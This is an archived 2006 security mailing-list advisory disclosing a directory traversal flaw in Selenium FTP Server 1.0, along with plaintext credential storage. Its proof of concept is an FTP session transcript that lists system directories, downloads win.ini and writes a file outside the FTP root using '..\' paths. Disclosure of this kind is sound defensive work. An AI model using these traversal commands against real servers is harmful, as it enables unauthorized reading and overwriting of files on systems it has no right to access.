Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Selenium FTP Server Directory Traversal

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Selenium FTP Server Directory Traversal
Date: 16 Nov 2006 10:50:37 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Selenium FTP Server Directory Traversal
------------------------------------------------------------------------


SUMMARY

 <http://bibasoftware.com/?page_id=15> Selenium FTP Server is vulnerable 
to a directory transversal input validation error in which a remote 
unauthenticated user can issue using the DIR, LIST,  NLST, etc commands to 
display any file on the remote server or use the GET/RECV command to 
retrieve any file outside the FTP root and the PUT/SEND to write to any 
location on the remote server.

DETAILS

Vulnerable Systems:
 * Selenium FTP Server version 1.0

Proof of concept:
C:\LinaresExploits\>ftp localhost
Connected to GregL-WS.
220 Selenium Server FTP (http://bibasoftware.com)
User (GregL-WS:(none)):
331 Password required for .
Password:
230 User  logged in.
ftp> dir \windows
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Nov 14 15:53 WINDOWS
226 File sent ok
ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec.
ftp> dir \windows\*.exe
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx   1 ftp      ftp        68096 May 02  2005 agrsmdel.exe
-rwxrwxrwx   1 ftp      ftp        44544 Jun 02  1998 clspack.exe
-rwxrwxrwx   1 ftp      ftp      1032192 Aug 04  2004 explorer.exe
-rwxrwxrwx   1 ftp      ftp        10752 May 26  2005 hh.exe
-rwxrwxrwx   1 ftp      ftp       306688 Oct 29  1998 IsUninst.exe
-rwxrwxrwx   1 ftp      ftp       112640 Jul 01  2001 lsb_un20.exe
-rwxrwxrwx   1 ftp      ftp        69120 Aug 04  2004 notepad.exe
-rwxrwxrwx   1 ftp      ftp        69120 Aug 04  2004 notepad1.exe
-rwxrwxrwx   1 ftp      ftp       146432 Aug 04  2004 regedit.exe
-rwxrwxrwx   1 ftp      ftp        46352 Feb 28  2003 setdebug.exe
-rwxrwxrwx   1 ftp      ftp       286720 Sep 07 14:10 Setup1.exe
-rwxrwxrwx   1 ftp      ftp        32866 Aug 04  2004 slrundll.exe
-rwxrwxrwx   1 ftp      ftp        46592 Aug 02  2002 SOUNDMAN.EXE
-rwxrwxrwx   1 ftp      ftp        73216 Sep 07 14:10 ST6UNST.EXE
-rwxrwxrwx   1 ftp      ftp        15360 Aug 04  2004 taskman.exe
-rwxrwxrwx   1 ftp      ftp        90624 Oct 27 13:22 tsuninst1.exe
-rwxrwxrwx   1 ftp      ftp        49680 Aug 04  2004 twunk_16.exe
-rwxrwxrwx   1 ftp      ftp        25600 Aug 04  2004 twunk_32.exe
-rwxrwxrwx   1 ftp      ftp       299520 Mar 23  1999 uninst.exe
-rwxrwxrwx   1 ftp      ftp       107134 Apr 04 08:06 UninstallFirefox.exe
-rwxrwxrwx   1 ftp      ftp        86016 Dec 17  1999 unvise32.exe
-rwxrwxrwx   1 ftp      ftp       256192 Aug 04  2004 winhelp.exe
-rwxrwxrwx   1 ftp      ftp       283648 Aug 04  2004 winhlp32.exe
226 File sent ok
ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec.
ftp> get ..\windows\win.ini C:\mine.txt
200 Port command successful.
150 Opening data connection for ..\windows\win.ini.
226 File sent ok
ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec.
ftp> put C:\mine.txt ..\windows\toobad.txt
200 Port command successful.
150 Opening data connection for ..\windows\toobad.txt.
226 File received ok
ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec.

Furthermore the software improperly writes any username/password that 
might be used to login to the program in plaintext to the file[s] stored 
in the default directory of C:\Program Files\BiBa SOFTWARE\Selenium 
Server\Servers


ADDITIONAL INFORMATION

The information has been provided by  <mailto:glinares.code@gmail.com> 
Greg Linares.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Selenium FTP Server Directory Traversal, SecuriTeam <=
Previous by Date:  [NT] Workstation Service NetpManageIPCConnect Buffer Overflow, SecuriTeam
Next by Date:  [NT] Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070, Exploit), SecuriTeam
Previous by Thread:  [NT] Workstation Service NetpManageIPCConnect Buffer Overflow, SecuriTeam
Next by Thread:  [NT] Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070, Exploit), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]